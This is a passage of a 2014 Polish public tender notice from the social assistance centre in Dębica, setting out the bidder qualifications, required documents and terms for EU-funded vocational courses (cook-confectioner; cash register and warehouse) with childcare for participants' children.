2) Wykaże , że w okresie ostatnich 3 lat przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje minimum 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie:
a) kurs obsługi kasy fiskalnej dla minimum 15 osób wraz z opieką dla minimum 3 dzieci
    uczestników szkolenia lub  ,
b) kurs gospodarka magazynowa dla minimum 15 osób wraz z opieką dla minimum 3 dzieci
    uczestników szkolenia  lub  ,
c) kurs obsługi kasy fiskalnej z gospodarką magazynową dla minimum 15 osób wraz z opieką
    dla minimum 3 dzieci uczestników szkolenia , lub,
d) kurs magazyniera z obsługą kasy fiskalnej dla minimum 15 osób wraz z opieką dla minimum
    3 dzieci uczestników szkolenia, 

- wraz z podaniem wartości usług, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączy dowody, czy usługi te zostały wykonane lub są wykonywane należycie.

W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - art.23 ust.2 ustawy Pzp,  oceniana będzie ich łączna wiedza i doświadczenie.

Dokumentami  potwierdzającymi spełnianie opisanego warunku posiadania wiedzy i doświadczenia jest : 
- Złożone Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ) oraz 
- Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług. 
   
Z złożonego wykazu głównych  usług winno jednoznacznie wynikać wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie: co najmniej 1 usługi szkoleniowej  polegającej na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie:
a) kurs obsługi kasy fiskalnej dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia lub  ,       b) kurs gospodarka magazynowa dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia  lub  c) kurs obsługi kasy fiskalnej z gospodarką magazynową dla minimum 15 osób wraz z opieką dla minimum 3 dzieci
    uczestników szkolenia , lub,
d) kurs magazyniera z obsługą kasy fiskalnej dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników
    szkolenia. 
   

Należy konkretnie wskazać przedmiot usługi, nazwę , podmiot na rzecz którego usługa została wykonana lub jest wykonywana, wykonawcę, rodzaj wykonywanej usługi, datę wykonania i przede wszystkim podać wartość usługi.
Do wykazu usług należy załączyć  dowód,  potwierdzający czy usługi zostały wykonane lub są wykonywane należycie. 

Zgodnie z treścią Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231) , dowodami o których mowa powyżej mogą być:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie wykonawcy- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Dla Części 3, 4 i 5 zamówienia: 
Zamawiający uzna, że warunek posiadania  wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca złoży wraz 
z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp - 
(Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla wszystkich Części zamówienia:
Zamawiający uzna, że warunek dysponowania odpowiednim potencjałem technicznym jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla wszystkich Części zamówienia: 
Zamawiający uzna, że warunek dysponowania  osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla wszystkich Części zamówienia: 
Zamawiający uzna, że warunek  dotyczący sytuacji ekonomicznej i finansowej jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie  o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Złożenie Wykazu głównych usług wraz z dowodami DOTYCZY WYŁĄCZNIE Części 1  i Części 2 zamówienia.

             Zgodnie z treścią Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231) , dowodami o których mowa powyżej mogą być:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie wykonawcy- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.

Na podstawie § 1 ust. 4  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231), zamawiający, w sposób obiektywny i niedyskryminacyjny określa usługi, których dotyczy obowiązek  wskazania w wykazie lub złożenia poświadczeń tj.  Wykaz głównych usług winien zawierać:  

Dla Części 1 zamówienia : 
Z złożonego wykazu głównych  usług winno jednoznacznie wynikać wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie: co najmniej 1 usługi szkoleniowej  polegającej na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie:
      a)  Kucharz-ciastkarz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub ,
b)  Kucharz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub 
      c)   Ciastkarz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub 
      d)  Cukiernik dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia

Należy konkretnie wskazać przedmiot usługi, nazwę , podmiot na rzecz którego usługa została wykonana lub jest wykonywana, wykonawcę, rodzaj wykonywanej usługi, datę wykonania i przede wszystkim podać wartość usługi.
Do wykazu usług należy załączyć  dowód,  potwierdzający czy usługi zostały wykonane lub są wykonywane należycie

Zamawiający nie żąda wskazania w Wykazie  informacji o usługach niewykonanych lub wykonanych nienależycie.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie wykonanych lub wykonywanych głównych usług, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej - podstawa prawna: § 1 ust. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231).

Dla Części 2 zamówienia : 
Z złożonego wykazu głównych  usług winno jednoznacznie wynikać wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie: co najmniej 1 usługi szkoleniowej  polegającej na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie:
a) kurs obsługi kasy fiskalnej dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia lub  ,       b) kurs gospodarka magazynowa dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia  lub  c) kurs obsługi kasy fiskalnej z gospodarką magazynową dla minimum 15 osób wraz z opieką dla minimum 3 dzieci
    uczestników szkolenia , lub,
d) kurs magazyniera z obsługą kasy fiskalnej dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników
    szkolenia. 
   
Należy konkretnie wskazać przedmiot usługi, nazwę , podmiot na rzecz którego usługa została wykonana lub jest wykonywana, wykonawcę, rodzaj wykonywanej usługi, datę wykonania i przede wszystkim podać wartość usługi.
Do wykazu usług należy załączyć  dowód,  potwierdzający czy usługi zostały wykonane lub są wykonywane należycie. 

Zamawiający nie żąda wskazania w Wykazie  informacji o usługach niewykonanych lub wykonanych nienależycie.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie wykonanych lub wykonywanych głównych usług, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej - podstawa prawna: § 1 ust. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik nr 3 do SIWZ). 2.Zgodnie z art. 26 ust.2b ustawy Pzp, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W przypadku złożenia wraz z ofertą przez Wykonawców w-w zobowiązania, Zamawiający powołując się na przepis art.26. ust 2b ustawy Pzp, przepisy art. 78 § 1 Kodeksu Cywilnego, oraz orzecznictwo KIO, stwierdza iż wymaganie formy pisemnej zobowiązania zostanie spełnione jedynie poprzez złożenie oryginału dokumentu zawierającego własnoręczny podpis osoby pod treścią oświadczenia - zobowiązania innego podmiotu, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Jeżeli Wykonawca, wykazując spełnianie warunków, których mowa w art.22 ust.1 ustawy Pzp, których opis sposobu dokonywania oceny Zamawiający określił w Rozdziale V SIWZ , polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów , żąda dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. (Podstawa prawna: § 1 ust. 6 - Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane- Dz.U. z 2013 r. poz. 231) Ponieważ ustawodawca użył w w-w przepisie sformułowania -w szczególności- żądanie powyższych dokumentów (punkty a - d), ma charakter przykładowy i nie jest wyczerpujące. W zależności od rodzaju przedłożonych dokumentów i sposobu sformułowania ich treści, zamawiający może żądać innych dokumentów, które w sposób jednoznaczny i wyczerpujący udowodnią zamawiającemu, że wykonawca będzie dysponował zasobami niezbędnymi do wykonania zamówienia i pozwolą dokonać: oceny czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów.Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia - podstawa prawna art. 36 b ust. 2 ustawy Prawo zamówień publicznych.  3. W przypadku składania oferty przez pełnomocnika, do oferty należy załączyć pełnomocnictwo w oryginale lub w formie kopii potwierdzonej notarialnie. 4. W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - art.23 ust.2 ustawy Pzp (np. Konsorcjum , spółki cywilne) do oferty muszą być dołączone indywidualne oświadczenia i dokumenty wymienione w Rozdziale VI ust.2 SIWZ i w Sekcji III.4.2) ogłoszenia o zamówieniu, dotyczące każdego z uczestników konsorcjum- wspólnika spółki cywilnej. W przypadku spółek cywilnych, Zamawiający wymaga również złożenia dokumentów wymienionych w Rozdziale VI ust.2 pkt 3) i 4) i Sekcji III.4.2) tiret 3 i 4 ogłoszenia o zamówieniu (ZUS i Nacz.Urz.Skarbowego) wystawionych na spółkę cywilną. 5. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (zgodnie z art.23 ust.2 ustawy Pzp) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 6. W przypadku składania oferty przez pełnomocnika, do oferty należy załączyć pełnomocnictwo w oryginale lub w formie kopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. 2. Zmiana terminu realizacji przedmiotu zamówienia jest dopuszczalna w wyjątkowych sytuacjach - jedynie za zgodą Zamawiającego. 3. Zmiana wynagrodzenia Wykonawcy za realizowane szkolenie może nastąpić wyłącznie w przypadku: a) Rezygnacji z udziału w szkoleniu osoby zakwalifikowanej na szkolenie - przed rozpoczęciem zajęć z przyczyn od niej niezależnych lub z powodu podjęcia przez nią zatrudnienia. Zamawiający w takim przypadku dokona dodatkowej kwalifikacji na dane szkolenie, a w przypadku braku takiej możliwości zapłata za szkolenie nastąpi za ilość osób faktycznie przeszkolonych. b) Rezygnacji z udziału w szkoleniu przez uczestnika szkolenia - po rozpoczęciu szkolenia, z przyczyn od niego niezależnych lub z powodu podjęcia przez niego zatrudnienia w trakcie trwania szkolenia. Zapłata za szkolenie wyżej wymienionej osoby będzie obejmowała faktycznie poniesione koszty pomocy dydaktycznych, oraz pozostałe koszty, proporcjonalnie do okresu faktycznego uczestnictwa tej osoby w szkoleniu, na podstawie zestawienia kosztów opracowanego przez Wykonawcę, które to zestawienie zostanie przedłożone przez Wykonawcę do zaakceptowania przez Zamawiajacego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Dębicy , 39-200 Dębica, ul. Stefana Batorego 13 - pokój nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Dębicy , 39-200 Dębica, ul. Stefana Batorego 13 - pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy - Czas na aktywność w Gminie Dębica- współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII- Promocja integracji społecznej, Działanie 7.1- Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1- Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs Kucharz - ciastkarz dla 23 osób ( 23 kobiet + opieka nad 4 dzieci w wieku od 3 do 7 lat).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Kucharz - ciastkarz dla 23 osób ( 23 kobiet + opieka nad 4 dzieci w wieku od 3 do 7 lat),
     a)  ilość osób do przeszkolenia: 23 osoby ( 23 kobiety),
     b)  ilość dzieci do zapewnienia opieki: 4 dzieci
     c)  minimalna liczba godzin szkolenia :  200 godzin dydaktycznych w tym 40 godz. teoretycznych
          i 160 godz. praktycznych (1 godzina dydaktyczna to 45 minut),
     d)  maksymalny okres trwania szkolenia -  6 tygodni,
     e)  godziny realizacji szkolenia - 8.00- 19.00 - maksymalnie 8 godzin dziennie,
     f)  miejsce realizacji szkolenia - Dębica,
     g)  termin realizacji szkolenia:  od kwietnia 2014 do 06 czerwca  2014 r.,


Wykonawca szkolenia zapewnia :

1) przeprowadzenie kursu zawodowego kucharz- ciastkarz przez osoby posiadające odpowiednie kwalifikacje zawodowe wymagane przepisami prawa,

2) salę wykładową, - sprzęt dydaktyczny, - materiały szkoleniowe dla uczestników, - warunki w czasie szkoleń zgodne z przepisami BHP, - wyżywienie: ciastka, kawa, herbata, woda mineralna, ciepły posiłek: drugie danie, - odzież robocza, 





3) opiekę nad dziećmi (4 dzieci w wieku od trzeciego do siódmego roku życia) uczestniczek projektu, biorących udział w szkoleniach, - posiłek, napoje, nadzór nad zabawami, animacje tych zabaw, zabawki, gry,

4) warunki w miejscu przebywania dzieci  zgodne z przepisami BHP, lokal winien spełniać wymagania określone w przepisach techniczno-budowlanych oraz przepisach o ochronie przeciwpożarowej dla kategorii zagrożenia ludzi ZL II, - pomieszczenie: powierzchnia dla dzieci od 3-5 dzieci wynosi co najmniej 16 m2, w przypadku liczby dzieci większej niż 5 powierzchnia ulega odpowiedniemu zwiększeniu na każde kolejne dziecko  o co najmniej 2 m2,

5) czas opieki nad dziećmi maksymalnie 8 godzin dziennie, - gry i zabawy adekwatne do wieku i zainteresowań i sprawności intelektualnej i psychoruchowej  dziecka, 

6) wykwalifikowaną kadrę do opieki nad dziećmi - wykształcenie wyższe w kierunku pedagogika przedszkolna i wczesnoszkolna z zakresu wychowania przedszkolnego i nauczania początkowego- uprawniająca do opieki nad dziećmi w wieku od 3 do 7 lat, osoba do opieki nad dziećmi winna posiadać minimum 1 roczne doświadczenie zawodowe w  zakresie objętym zamówieniem,

7) umieszczenie w sali szkoleniowej informacji o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, 

8)  pokrycie kosztów niezbędnych badań lekarskich uczestników szkolenia,

9)  ubezpieczenie od następstw nieszczęśliwych wypadków uczestniczek szkolenia oraz ich dzieci  
    (w drodze na szkolenia, w trakcie szkolenia oraz w drodze powrotnej ze szkolenia),

10) Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych(Dz. U. z 2006 r. Nr 31 poz. 216). Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, 

11) po  wykonaniu zadania (ukończeniu szkolenia) przedstawia Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów, oraz kserokopie wydanych certyfikatów wraz z potwierdzeniem odbioru certyfikatu przez uczestnika szkolenia,  

12)  zwrot kosztów przejazdu uczestnika oraz dziecka (jeżeli dotyczy) z miejsca zamieszkania do Dębicy i powrót na podstawie najtańszego środka transportu - cena biletu,

13) W przypadku braku dojazdu do miejsca szkolenia lub gdy szkolenie będzie się odbywać poza terenem Dębicy - Wykonawca zapewni dojazd uczestników projektu do miejsca szkolenia i powrót oraz dojazd dzieci do miejsca opieki i powrót.  Przewóz dzieci z rodzicami z uzgodnionego miejsca do miejsca odbywania się szkoleń (jeżeli opieka nad dzieckiem odbywać się będzie poza budynkiem szkolenia) oraz przywóz dzieci o określonej porze na zakończenie szkolenia. 
Dopuszcza się możliwość przewozu dzieci z rodzicami z uzgodnionego miejsca do miejsca w którym będzie się odbywać opieka nad dziećmi i dowóz rodziców na miejsce szkolenia, a po zakończeniu szkolenia w danym dniu  przejazd uczestniczek  po dzieci i dowiezienie do uzgodnionego miejsca powrotu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kasy fiskalnej z gospodarką magazynową dla 23 osób 
( 23 kobiety + opieka nad 5 dzieci w wieku 3 - 7 lat).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kasy fiskalnej z gospodarką magazynową dla 23 osób 
( 23 kobiety + opieka nad 5 dzieci w wieku 3 - 7 lat) , 
    a)  ilość osób do przeszkolenia: 23 osoby ( 23 kobiety ) ,
    b)  ilość dzieci do zapewnienia opieki: 5 dzieci
    c)  minimalna liczba godzin szkolenia - 78 godzin dydaktycznych w tym 49 godz. teoretycznych 
         i 29 godz. praktycznych  (1 godzina dydaktyczna to 45 minut)
    d)  maksymalny okres trwania szkolenia-  2 tygodnie
    e)  godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dziennie
    f)   miejsce realizacji szkolenia - Dębica
    g)  termin realizacji szkolenia :  do 25 czerwiec  2014 r.

Wykonawca szkolenia zapewnia :

1)  przeprowadzenie kursu zawodowego - Kurs kasy fiskalnej z gospodarką magazynową- przez osoby posiadające odpowiednie kwalifikacje zawodowe wymagane przepisami prawa,

2) salę wykładową, - sprzęt dydaktyczny, - materiały szkoleniowe dla uczestników , - warunki w czasie szkoleń zgodne z przepisami BHP, - wyżywienie: ciastka , kawa, herbata, woda mineralna, ciepły posiłek: drugie danie, - odzież robocza, 

3) opiekę nad dziećmi (5 dzieci w wieku od trzeciego do siódmego roku życia) uczestniczek projektu, biorących udział w szkoleniach, - posiłek, napoje, nadzór nad zabawami, animacje tych zabaw, zabawki, gry,

4) warunki w miejscu przebywania dzieci  zgodne z przepisami BHP, lokal winien spełniać wymagania określone w przepisach techniczno-budowlanych oraz przepisach o ochronie przeciwpożarowej dla kategorii zagrożenia ludzi ZL II, - pomieszczenie: powierzchnia dla dzieci od 3-5 dzieci wynosi co najmniej 16 m2, w przypadku liczby dzieci większej niż 5 powierzchnia ulega odpowiedniemu zwiększeniu na każde kolejne dziecko  o co najmniej 2 m2,

5) czas opieki nad dziećmi maksymalnie 8 godzin dziennie, - gry i zabawy adekwatne do wieku i zainteresowań dziecka, 

6) wykwalifikowaną kadrę do opieki nad dziećmi - wykształcenie wyższe w kierunku pedagogika przedszkolna i wczesnoszkolna z zakresu wychowania przedszkolnego - uprawniająca do opieki nad dziećmi w wieku od 3 do 7 lat, osoba do opieki nad dziećmi winna posiadać minimum 1 roczne doświadczenie zawodowe w  zakresie objętym zamówieniem,

